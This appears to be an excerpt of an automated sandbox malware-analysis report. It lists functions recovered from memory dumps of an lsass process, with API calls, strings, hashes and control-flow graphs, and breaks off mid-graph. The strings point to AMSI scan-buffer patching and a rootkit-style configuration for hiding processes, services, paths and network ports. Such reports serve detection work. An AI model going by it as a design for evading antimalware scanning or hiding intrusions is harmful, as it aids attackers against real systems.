                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProcSleep
                                                                      • String ID: AmsiScanBuffer$amsi.dll
                                                                      • API String ID: 188063004-3248079830
                                                                      • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction ID: 8d31a156479c45965128d2f6ee04712fcb7c3d3bea6b81f0a861a1b27b9b627e
                                                                      • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction Fuzzy Hash: D5D04230691B0095FA0A6B12E8947943262AFACB21FB40415CA0E032B0DE3C9D59D3D2

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32 ref: 00000140AE863A35
                                                                      • PathFindFileNameW.SHLWAPI ref: 00000140AE863A44
                                                                        • Part of subcall function 00000140AE863F88: StrCmpNIW.SHLWAPI(?,?,?,00000140AE86272F), ref: 00000140AE863FA0
                                                                        • Part of subcall function 00000140AE863EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863EDB
                                                                        • Part of subcall function 00000140AE863EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863F0E
                                                                        • Part of subcall function 00000140AE863EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863F2E
                                                                        • Part of subcall function 00000140AE863EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863F47
                                                                        • Part of subcall function 00000140AE863EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863F68
                                                                      • CreateThread.KERNELBASE ref: 00000140AE863A8B
                                                                        • Part of subcall function 00000140AE861E74: GetCurrentThread.KERNEL32 ref: 00000140AE861E7F
                                                                        • Part of subcall function 00000140AE861E74: CreateThread.KERNELBASE ref: 00000140AE862043
                                                                        • Part of subcall function 00000140AE861E74: TlsAlloc.KERNEL32 ref: 00000140AE862049
                                                                        • Part of subcall function 00000140AE861E74: TlsAlloc.KERNEL32 ref: 00000140AE862055
                                                                        • Part of subcall function 00000140AE861E74: TlsAlloc.KERNEL32 ref: 00000140AE862061
                                                                        • Part of subcall function 00000140AE861E74: TlsAlloc.KERNEL32 ref: 00000140AE86206D
                                                                        • Part of subcall function 00000140AE861E74: TlsAlloc.KERNEL32 ref: 00000140AE862079
                                                                        • Part of subcall function 00000140AE861E74: TlsAlloc.KERNEL32 ref: 00000140AE862085
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 2779030803-0
                                                                      • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                                      • Instruction ID: a38a35cac72c52bd20d8c2cf22f6dff54f2e4a64fc6af371d7a537c333d09727
                                                                      • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                                      • Instruction Fuzzy Hash: 861121316D0B8191F762A723A5457D92291A79C3A6FB041199F0E835F1DF78CC44D6D2
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000003.2361554206.00000140ADFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_3_140adfc0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                      • Instruction ID: 9fcaa5963dbb178648860b710fd825bb80e08b252c09e535425a199a505297ec
                                                                      • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                      • Instruction Fuzzy Hash: 0B91E572B213589BDB558F26D4007AB73D3FB59BD8F6881249F4947798DA34D823D700

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00000140AE861724: GetProcessHeap.KERNEL32 ref: 00000140AE86172F
                                                                        • Part of subcall function 00000140AE861724: HeapAlloc.KERNEL32 ref: 00000140AE86173E
                                                                        • Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617AE
                                                                        • Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617DB
                                                                        • Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE8617F5
                                                                        • Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861815
                                                                        • Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE861830
                                                                        • Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861850
                                                                        • Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE86186B
                                                                        • Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86188B
                                                                        • Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE8618A6
                                                                        • Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8618C6
                                                                      • SleepEx.KERNELBASE ref: 00000140AE861BDF
                                                                        • Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE8618E1
                                                                        • Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861901
                                                                        • Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE86191C
                                                                        • Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86193C
                                                                        • Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE861957
                                                                        • Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861977
                                                                        • Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE861992
                                                                        • Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE86199C
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                      • String ID:
                                                                      • API String ID: 948135145-0
                                                                      • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                                      • Instruction ID: a93f48e7d1e197921b2c89fcc1377b430e77d193c78992cad38dce1289e891a4
                                                                      • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                                      • Instruction Fuzzy Hash: B831E675280B5181EB52AB27D9513ED63A5AB8CBE0F2458219F0E877B7DF34CC50C296

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 311 140ae862ff0-140ae863069 313 140ae863384-140ae8633a7 311->313 314 140ae86306f-140ae863075 311->314 314->313 315 140ae86307b-140ae86307e 314->315 315->313 316 140ae863084-140ae863087 315->316 316->313 317 140ae86308d-140ae86309d GetModuleHandleA 316->317 318 140ae8630b1 317->318 319 140ae86309f-140ae8630af GetProcAddress 317->319 320 140ae8630b4-140ae8630d2 318->320 319->320 320->313 322 140ae8630d8-140ae8630f7 StrCmpNIW 320->322 322->313 323 140ae8630fd-140ae863101 322->323 323->313 324 140ae863107-140ae863111 323->324 324->313 325 140ae863117-140ae86311e 324->325 325->313 326 140ae863124-140ae863137 325->326 327 140ae863147 326->327 328 140ae863139-140ae863145 326->328 329 140ae86314a-140ae86314e 327->329 328->329 330 140ae863150-140ae86315c 329->330 331 140ae86315e 329->331 332 140ae863161-140ae86316b 330->332 331->332 333 140ae863251-140ae863255 332->333 334 140ae863171-140ae863174 332->334 335 140ae863376-140ae86337e 333->335 336 140ae86325b-140ae86325e 333->336 337 140ae863186-140ae863190 334->337 338 140ae863176-140ae863183 call 140ae861a30 334->338 335->313 335->326 339 140ae863260-140ae86326c call 140ae861a30 336->339 340 140ae86326f-140ae863279 336->340 342 140ae8631c4-140ae8631ce 337->342 343 140ae863192-140ae86319f 337->343 338->337 339->340 347 140ae86327b-140ae863288 340->347 348 140ae8632a9-140ae8632ac 340->348 344 140ae8631d0-140ae8631dd 342->344 345 140ae8631fe-140ae863201 342->345 343->342 350 140ae8631a1-140ae8631ae 343->350 344->345 351 140ae8631df-140ae8631ec 344->351 353 140ae863203-140ae86320d call 140ae861cc4 345->353 354 140ae86320f-140ae86321c lstrlenW 345->354 347->348 355 140ae86328a-140ae863297 347->355 356 140ae8632ae-140ae8632b7 call 140ae861cc4 348->356 357 140ae8632b9-140ae8632c6 lstrlenW 348->357 358 140ae8631b1-140ae8631b7 350->358 361 140ae8631ef-140ae8631f5 351->361 353->354 367 140ae863247-140ae86324c 353->367 364 140ae86321e-140ae86322d call 140ae861cfc 354->364 365 140ae86322f-140ae863241 call 140ae863f88 354->365 363 140ae86329a-140ae8632a0 355->363 356->357 375 140ae8632ee-140ae8632f9 356->375 359 140ae8632c8-140ae8632d7 call 140ae861cfc 357->359 360 140ae8632d9-140ae8632e3 call 140ae863f88 357->360 358->367 368 140ae8631bd-140ae8631c2 358->368 359->360 359->375 370 140ae8632e6-140ae8632e8 360->370 361->367 372 140ae8631f7-140ae8631fc 361->372 374 140ae8632a2-140ae8632a7 363->374 363->375 364->365 364->367 365->367 365->370 367->370 368->342 368->358 370->335 370->375 372->345 372->361 374->348 374->363 381 140ae863370-140ae863374 375->381 382 140ae8632fb-140ae8632ff 375->382 381->335 385 140ae863307-140ae863321 call 140ae873a40 382->385 386 140ae863301-140ae863305 382->386 387 140ae863324-140ae863327 385->387 386->385 386->387 390 140ae86334a-140ae86334d 387->390 391 140ae863329-140ae863347 call 140ae873a40 387->391 390->381 392 140ae86334f-140ae86336d call 140ae873a40 390->392 391->390 392->381
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction ID: 30105a61bc151a0cf1162bf0fe0c77605415bb98e870bb877dae239f2002ea45
                                                                      • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction Fuzzy Hash: E5B16A3225079086EB669F27D5007E9A3A5FB88BA4F645016EF0D57BB4DF35CD80C382
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction ID: 30f55be31c68febc232c55efff6d7e1e80c135477459ee66c31d45664086d95c
                                                                      • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                                      • Instruction Fuzzy Hash: 10317072255B808AEB61DF61E8403ED7364F788758F64402ADF4E47BA9DF38C948C711
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction ID: 78ba84541a86c6d43e78bd0af016faa51c5a0e34a5652c69362c780adff1c5ac
                                                                      • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction Fuzzy Hash: 4B415B36254F8086EB61DB26E8403EE73A4F788768F600115EF9D47BA8DF38C955CB41
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFile$FirstNext
                                                                      • String ID:
                                                                      • API String ID: 1164774033-0
                                                                      • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction ID: 6a24d750cc30c13e93ee8cb67e7a54552aac04a3848ba964ee03a28b82ffad1c
                                                                      • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                                      • Instruction Fuzzy Hash: BFA1D33274478049FB22AB77A4407ED6BA1A789BB4F244115DF9C27BFDDA38C841C782

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 2135414181-3572789727
                                                                      • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction ID: a5e638187db61ddf807089c7b241eab6c5c83a185a32c0152d227a07cfa3afc6
                                                                      • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                                      • Instruction Fuzzy Hash: E771D736750B5186EB22AF66E8906D933A4FB8CBA8F601111EF4D57B79DF38C844C781

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction ID: f6094fa10016ead736d6be57b1c461f648ea31a726f70ec7dbbb6fdacba43793
                                                                      • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction Fuzzy Hash: A9515D32250B8496E725DF62E54839AB7A2F788FA9F644124DF4D07728DF3CC449C781

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                      • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                      • API String ID: 740688525-1880043860
                                                                      • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction ID: 7749dad9bab9c0c178065b4a53cf799951ec2e8d7f54f84ac44c295c086c618d
                                                                      • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction Fuzzy Hash: 31514931781B4451EA179B57A8507E932A0BB4DBB0FB80B259F3D473E0EF38D845C682

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Running Time
                                                                      • API String ID: 1943346504-1805530042
                                                                      • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction ID: 263b5d98dfd789f97b615d5b37c350a8b9572b51cf3b79b6f5569e1132c5a4cb
                                                                      • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction Fuzzy Hash: 6531CE32A40B8096E722DF13A944399B3A0FB9CBE5F6401249F4D43A34DF38D856C381

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Utilization Percentage
                                                                      • API String ID: 1943346504-3507739905
                                                                      • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction ID: 4f6d85a2fb98f14b4997691a7945017fb243bf8ecf7ad2143475a864ba089b29
                                                                      • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction Fuzzy Hash: F0313E31650B818AE752DF63A88879973A1BB8CFA9F6441259F4E43734EF38D845C781

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 427 140ae86a22c-140ae86a294 call 140ae86b144 430 140ae86a6f5-140ae86a6fb call 140ae86c388 427->430 431 140ae86a29a-140ae86a29d 427->431 431->430 432 140ae86a2a3-140ae86a2a9 431->432 434 140ae86a2af-140ae86a2b3 432->434 435 140ae86a378-140ae86a38a 432->435 434->435 439 140ae86a2b9-140ae86a2c4 434->439 437 140ae86a645-140ae86a649 435->437 438 140ae86a390-140ae86a394 435->438 440 140ae86a682-140ae86a68c call 140ae869324 437->440 441 140ae86a64b-140ae86a652 437->441 438->437 442 140ae86a39a-140ae86a3a5 438->442 439->435 443 140ae86a2ca-140ae86a2cf 439->443 440->430 453 140ae86a68e-140ae86a6ad call 140ae868070 440->453 441->430 444 140ae86a658-140ae86a67d call 140ae86a6fc 441->444 442->437 446 140ae86a3ab-140ae86a3af 442->446 443->435 447 140ae86a2d5-140ae86a2df call 140ae869324 443->447 444->440 450 140ae86a575-140ae86a581 446->450 451 140ae86a3b5-140ae86a3f0 call 140ae869704 446->451 447->453 457 140ae86a2e5-140ae86a310 call 140ae869324 * 2 call 140ae869a0c 447->457 450->440 454 140ae86a587-140ae86a58b 450->454 451->450 462 140ae86a3f6-140ae86a3ff 451->462 459 140ae86a58d-140ae86a599 call 140ae8699cc 454->459 460 140ae86a59b-140ae86a5a3 454->460 494 140ae86a312-140ae86a316 457->494 495 140ae86a330-140ae86a33a call 140ae869324 457->495 459->460 475 140ae86a5bc-140ae86a5c4 459->475 460->440 466 140ae86a5a9-140ae86a5b6 call 140ae8695a4 460->466 468 140ae86a403-140ae86a435 462->468 466->440 466->475 472 140ae86a43b-140ae86a447 468->472 473 140ae86a568-140ae86a56f 468->473 472->473 476 140ae86a44d-140ae86a46c 472->476 473->450 473->468 477 140ae86a5ca-140ae86a5ce 475->477 478 140ae86a6d8-140ae86a6f4 call 140ae869324 * 2 call 140ae86c2f4 475->478 480 140ae86a472-140ae86a4af call 140ae8699e0 * 2 476->480 481 140ae86a558-140ae86a55d 476->481 482 140ae86a5d0-140ae86a5df call 140ae8699cc 477->482 483 140ae86a5e1 477->483 478->430 507 140ae86a4e2-140ae86a4e5 480->507 481->473 490 140ae86a5e3-140ae86a5ed call 140ae86b1dc 482->490 483->490 490->440 505 140ae86a5f3-140ae86a643 call 140ae869634 call 140ae869838 490->505 494->495 499 140ae86a318-140ae86a323 494->499 495->435 510 140ae86a33c-140ae86a35c call 140ae869324 * 2 call 140ae86b1dc 495->510 499->495 504 140ae86a325-140ae86a32a 499->504 504->430 504->495 505->440 511 140ae86a4e7-140ae86a4ee 507->511 512 140ae86a4b1-140ae86a4d7 call 140ae8699e0 call 140ae86a96c 507->512 532 140ae86a373 510->532 533 